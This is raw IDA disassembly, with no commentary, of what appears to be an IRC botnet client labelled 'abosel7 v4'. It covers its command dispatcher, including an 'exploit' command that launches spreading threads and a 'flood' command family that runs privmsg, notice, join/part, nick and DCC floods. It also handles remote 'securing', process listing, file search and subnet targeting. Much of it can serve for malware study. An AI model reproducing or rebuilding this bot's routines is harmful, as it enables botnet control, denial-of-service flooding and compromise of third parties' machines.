cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40434A
loc_404334: ; CODE XREF: sub_401ACD+287B�j
cmp [ebp+var_150C], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404334
; ---------------------------------------------------------------------------
loc_40434A: ; CODE XREF: sub_401ACD+2865�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BE34
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_40435B: ; CODE XREF: sub_401ACD+16FC�j
; sub_401ACD+1711�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415CC0
push offset unk_42BE1C
call sub_415D38
loc_404376: ; CODE XREF: sub_401ACD+23F9�j
add esp, 10h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40437E: ; CODE XREF: sub_401ACD+16D2�j
; sub_401ACD+16E7�j
push [ebp+Format] ; Format
lea eax, [ebp+var_C5C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_C60], eax
mov eax, [ebp+var_4]
mov [ebp+var_BD4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_BD0], eax
jz short loc_4043D8
push offset aSub ; "sub"
push esi ; Str1
call _strcmp
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_BD8], eax
jmp short loc_4043DE
; ---------------------------------------------------------------------------
loc_4043D8: ; CODE XREF: sub_401ACD+28EF�j
mov [ebp+var_BD8], ebx
loc_4043DE: ; CODE XREF: sub_401ACD+2909�j
lea eax, [ebp+Dst]
push offset asc_42BDF8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 28h ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov [ebp+var_BDC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C60]
push ebx
push eax
push offset sub_40B425
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_BDC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40444C
loc_404436: ; CODE XREF: sub_401ACD+297D�j
cmp [ebp+var_BCC], ebx
jnz loc_406C1F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404436
; ---------------------------------------------------------------------------
loc_40444C: ; CODE XREF: sub_401ACD+2967�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BDBC
jmp loc_409091
; ---------------------------------------------------------------------------
loc_40445D: ; CODE XREF: sub_401ACD+1656�j
; sub_401ACD+166B�j
push offset aSbrti ; "sbrti"
push offset unk_42BDA4 ; Format
loc_404467: ; CODE XREF: sub_401ACD+29D9�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 20h
jmp loc_406C1F
; ---------------------------------------------------------------------------
loc_404494: ; CODE XREF: sub_401ACD+162C�j
; sub_401ACD+1641�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
push offset unk_42BD78
jmp short loc_404467
; ---------------------------------------------------------------------------
loc_4044A8: ; CODE XREF: sub_401ACD+1602�j
; sub_401ACD+1617�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4044DA
cmp [ebp+var_C], ebx
jz short loc_4044E9
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4044E9
push eax ; Args
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
jmp short loc_4044E9
; ---------------------------------------------------------------------------
loc_4044DA: ; CODE XREF: sub_401ACD+29E4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4] ; int
call sub_409823
pop ecx
pop ecx
loc_4044E9: ; CODE XREF: sub_401ACD+29E9�j
; sub_401ACD+29F8�j ...
push 0FFFFFFFEh
jmp loc_401F77
; ---------------------------------------------------------------------------
loc_4044F0: ; CODE XREF: sub_401ACD+15D8�j
; sub_401ACD+15ED�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409823
push offset unk_42BD28
call sub_415D38
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_404512: ; CODE XREF: sub_401ACD+15AE�j
; sub_401ACD+15C3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409823
push offset unk_42BCF8
call sub_415D38
add esp, 0Ch
jmp loc_4095AD
; ---------------------------------------------------------------------------
loc_404531: ; CODE XREF: sub_401ACD+1584�j
; sub_401ACD+1599�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BA9E
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404547: ; CODE XREF: sub_401ACD+155A�j
; sub_401ACD+156F�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BA49
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_40455D: ; CODE XREF: sub_401ACD+1530�j
; sub_401ACD+1545�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40B9DD
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404573: ; CODE XREF: sub_401ACD+1506�j
; sub_401ACD+151B�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40B90E
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404589: ; CODE XREF: sub_401ACD+1461�j
; sub_401ACD+1476�j
push dword ptr [ebp+esi+Args]
push 27h
push offset aProcessList ; "Process list"
push offset dword_42BCD8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4045A1: ; CODE XREF: sub_401ACD+1437�j
; sub_401ACD+144C�j
push dword ptr [ebp+esi+Args]
push 24h
push offset aFindFile ; "Find file"
push offset dword_42BCBC
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4045B9: ; CODE XREF: sub_401ACD+1050�j
; sub_401ACD+1065�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_4045D8
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_4045D8
push edi ; Str
call _atoi
pop ecx
jmp short loc_4045DD
; ---------------------------------------------------------------------------
loc_4045D8: ; CODE XREF: sub_401ACD+2AF5�j
; sub_401ACD+2B00�j
mov eax, dword_429074
loc_4045DD: ; CODE XREF: sub_401ACD+2B09�j
mov esi, [ebp+esi+Format]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_404602
push esi ; Format
loc_4045EF: ; CODE XREF: sub_401ACD+2B44�j
lea eax, [ebp+var_5A0]
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_404619
; ---------------------------------------------------------------------------
loc_404602: ; CODE XREF: sub_401ACD+2B1F�j
cmp [ebp+var_8FF], bl
jz short loc_404613
lea eax, [ebp+var_C4]
push eax
jmp short loc_4045EF
; ---------------------------------------------------------------------------
loc_404613: ; CODE XREF: sub_401ACD+2B3B�j
mov [ebp+var_5A0], bl
loc_404619: ; CODE XREF: sub_401ACD+2B33�j
mov eax, [ebp+var_4]
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax ; Dest
mov [ebp+var_624], esi
call __snprintf
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42BC94 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 19h ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_411BCE
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4046CA
loc_4046B4: ; CODE XREF: sub_401ACD+2BFB�j
cmp [ebp+var_57C], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4046B4
; ---------------------------------------------------------------------------
loc_4046CA: ; CODE XREF: sub_401ACD+2BE5�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42BC58
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_401ACD+FFD�j
; sub_401ACD+1012�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4046FB
push esi ; Str
call _atoi
test ax, ax
pop ecx
jz short loc_4046FB
push esi ; Str
call _atoi
pop ecx
jmp short loc_404701
; ---------------------------------------------------------------------------
loc_4046FB: ; CODE XREF: sub_401ACD+2C17�j
; sub_401ACD+2C23�j
mov ax, word_429084
loc_404701: ; CODE XREF: sub_401ACD+2C2C�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax ; Dest
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call __snprintf
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42BC2C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push edi ; int
push eax ; int
push [ebp+Format] ; Str
push esi ; int
call sub_409869
push ebx ; int
lea eax, [ebp+Dst]
push 6 ; int
push eax ; Source
call sub_40B3BA
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40EF1C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4047D0
loc_4047BA: ; CODE XREF: sub_401ACD+2D01�j
cmp [ebp+var_968], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4047BA
; ---------------------------------------------------------------------------
loc_4047D0: ; CODE XREF: sub_401ACD+2CEB�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BBEC
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_4047E1: ; CODE XREF: sub_401ACD+FA9�j
; sub_401ACD+FBE�j ...
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404809
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
pop ecx
mov [ebp+var_AA8], ebx
test eax, eax
pop ecx
jnz short loc_404813
loc_404809: ; CODE XREF: sub_401ACD+2D23�j
mov [ebp+var_AA8], 1
loc_404813: ; CODE XREF: sub_401ACD+2D3A�j
push [ebp+Format] ; Format
lea eax, [ebp+var_B2C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_AA8], ebx
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
mov [ebp+var_AA0], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40485A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40485A: ; CODE XREF: sub_401ACD+2D86�j
push eax
push offset asc_42BBB8 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 22h ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_41A366
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4048CE
loc_4048B8: ; CODE XREF: sub_401ACD+2DFF�j
cmp [ebp+var_A9C], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4048B8
; ---------------------------------------------------------------------------
loc_4048CE: ; CODE XREF: sub_401ACD+2DE9�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42BB7C
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_4048DF: ; CODE XREF: sub_401ACD+F7F�j
; sub_401ACD+F94�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41ABFB
loc_4048F0: ; CODE XREF: sub_401ACD+2A75�j
; sub_401ACD+2A8B�j ...
add esp, 0Ch
jmp loc_409644
; ---------------------------------------------------------------------------
loc_4048F8: ; CODE XREF: sub_401ACD+F55�j
; sub_401ACD+F6A�j
push offset unk_42BB2C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_404902: ; CODE XREF: sub_401ACD+F2B�j
; sub_401ACD+F40�j
push offset aAbosel7V4 ; "abosel7 v4"
push offset dword_42BB1C
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_404911: ; CODE XREF: sub_401ACD+F01�j
; sub_401ACD+F16�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404971
push esi ; Str
call _atoi
cmp eax, ebx
pop ecx
jl short loc_404966
cmp eax, 3
jge short loc_404966
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40495B
lea eax, [esi+1]
push eax
lea eax, [ebp+Dst]
push offset unk_42CD50 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
mov [esi], bl
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_40495B: ; CODE XREF: sub_401ACD+2E6D�j
push eax
push offset unk_42BAF0
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404966: ; CODE XREF: sub_401ACD+2E58�j
; sub_401ACD+2E5D�j
push eax
push offset unk_42BAC4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404971: ; CODE XREF: sub_401ACD+2E4D�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_404976: ; CODE XREF: sub_401ACD+2EC5�j
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404999
inc esi
add edi, 80h
cmp esi, 3
jl short loc_404976
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_404999: ; CODE XREF: sub_401ACD+2EB9�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
push offset unk_42CD50
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_4049B3: ; CODE XREF: sub_401ACD+ED7�j
; sub_401ACD+EEC�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403446
call sub_40B583
push ebx
call ds:dword_42706C ; ExitProcess
loc_4049D9: ; CODE XREF: sub_401ACD+19B1�j
push offset aGet_1 ; "get"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404A67
cmp dword_4CF180, ebx
jz short loc_404A01
push offset byte_4CEB60
loc_4049F7: ; CODE XREF: sub_401ACD+2F98�j
push offset unk_42BA88
jmp loc_404A97
; ---------------------------------------------------------------------------
loc_404A01: ; CODE XREF: sub_401ACD+2F23�j
push 10h
pop eax
mov [ebp+var_2CC], eax
push eax ; Size
lea eax, [ebp+var_2E8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call ds:dword_427214 ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E24]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+var_E24]
push eax
jmp short loc_4049F7
; ---------------------------------------------------------------------------
loc_404A67: ; CODE XREF: sub_401ACD+2F1B�j
push edi
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
push edi ; Source
jnz short loc_404A7B
push offset unk_42BA48
jmp short loc_404A97
; ---------------------------------------------------------------------------
loc_404A7B: ; CODE XREF: sub_401ACD+2FA5�j
push offset byte_4CEB60 ; Dest
call _strcpy
pop ecx
mov dword_4CF180, 1
pop ecx
push edi
push offset asc_42BA1C ; "-"
loc_404A97: ; CODE XREF: sub_401ACD+2F2F�j
; sub_401ACD+2FAC�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_40349D
; ---------------------------------------------------------------------------
loc_404AAB: ; CODE XREF: sub_401ACD+199C�j
push [ebp+arg_8] ; Str2
push offset aExploit ; "exploit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404BB1
mov eax, [ebp+var_4]
mov esi, 80h
mov [ebp+var_13E8], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F8], eax
push offset aF ; "#f"
lea eax, [ebp+var_1478]
push esi ; Count
push eax ; Dest
mov [ebp+var_13F0], 1
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_14F8]
push offset aF ; "#f"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1508]
push edi ; Format
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1508]
push eax
lea eax, [ebp+Dst]
push offset asc_42B9E4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov [ebp+var_13EC], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1508]
push ebx
push eax
push offset sub_40BB65
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_13EC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_404BA0
loc_404B8A: ; CODE XREF: sub_401ACD+30D1�j
cmp [ebp+var_13E0], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404B8A
; ---------------------------------------------------------------------------
loc_404BA0: ; CODE XREF: sub_401ACD+30BB�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B9A4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404BB1: ; CODE XREF: sub_401ACD+2FEF�j
push [ebp+arg_8] ; Str2
push offset aReconnect_in ; "reconnect.in"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095B4
push [ebp+arg_8] ; Str2
push offset aRin ; "rin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095B4
push [ebp+arg_8] ; Str2
push offset aReconnect_in_m ; "reconnect.in.ms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409570
push [ebp+arg_8] ; Str2
push offset aRinms ; "rinms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409570
push [ebp+arg_8] ; Str2
push offset aFlood ; "flood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4057B7
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
push edi ; Str2
push offset aLoad ; "load"
call _strcmp
add esp, 0Ch
test eax, eax
jnz short loc_404CB7
cmp [ebp+esi+var_80], ebx
jz short loc_404CB7
push [ebp+esi+var_80] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Str2] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Format] ; Source
call sub_417E06
add esp, 0Ch
lea eax, [ebp+Dst]
push [ebp+esi+Str2]
push [ebp+esi+Format]
push [ebp+esi+var_80]
push offset asc_42B93C ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_8], ebx
jnz short loc_404CB7
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_404CB7: ; CODE XREF: sub_401ACD+3173�j
; sub_401ACD+3179�j ...
push edi ; Str2
push offset aPm ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404D21
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404D21
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax ; Src
call sub_41843B
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_404D21: ; CODE XREF: sub_401ACD+31F9�j
; sub_401ACD+3204�j
push edi ; Str2
push offset aCt ; "ct"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404D8B
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404D8B
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax ; Src
call sub_41843B
push eax ; Source
lea eax, [ebp+var_4AF4]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4AF4]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS ; "privmsg %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_404D8B: ; CODE XREF: sub_401ACD+3263�j
; sub_401ACD+326E�j
push edi ; Str2
push offset aNt ; "nt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404DF5
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404DF5
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax ; Src
call sub_41843B
push eax ; Source
lea eax, [ebp+var_48F0]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_0 ; "notice %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_404DF5: ; CODE XREF: sub_401ACD+32CD�j
; sub_401ACD+32D8�j
push edi ; Str2
push offset aMode ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404E5F
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404E5F
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax ; Src
call sub_41843B
push eax ; Source
lea eax, [ebp+var_4FF8]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4FF8]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aModeSS ; "mode %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_404E5F: ; CODE XREF: sub_401ACD+3337�j
; sub_401ACD+3342�j
push edi ; Str2
push offset aJoin ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404E9C
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_404E9C
push eax
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_404E9C: ; CODE XREF: sub_401ACD+33A1�j
; sub_401ACD+33AC�j
push edi ; Str2
push offset aPart_0 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404ED9
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_404ED9
push eax
lea eax, [ebp+Dst]
push offset aPartS ; "part %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_404ED9: ; CODE XREF: sub_401ACD+33DE�j
; sub_401ACD+33E9�j
push edi ; Str2
push offset aPartflood ; "partflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404F1B
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_404F1B
push offset dword_427620
push eax
lea eax, [ebp+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_404F1B: ; CODE XREF: sub_401ACD+341B�j
; sub_401ACD+3426�j
push edi ; Str2
push offset aPnick ; "pnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404F92
cmp [ebp+esi+Format], ebx
jz short loc_404F92
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B8]
push edx
push [ebp+esi+Format]
push offset aSI ; "%s%i"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_17B8]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_404F92: ; CODE XREF: sub_401ACD+345D�j
; sub_401ACD+3466�j
push edi ; Str2
push offset aJoinPart ; "join/part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4050E9
cmp [ebp+esi+Format], ebx
jz loc_4050E9
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_427620
push [ebp+esi+Format]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427620
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 0C8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427620
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_4050E9: ; CODE XREF: sub_401ACD+34D4�j
; sub_401ACD+34E1�j
push edi ; Str2
push offset aDcc ; "dcc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405181
cmp [ebp+esi+Format], ebx
jz short loc_405181
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+Dst]
push edx
push [ebp+esi+Format]
push offset aPrivmsgS_0 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 24h
loc_405181: ; CODE XREF: sub_401ACD+362B�j
; sub_401ACD+3638�j
push edi ; Str2
push offset aNick_0 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405289
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz loc_405289
push eax
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_417E84
add esp, 14h
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_417E84
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 1F4h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
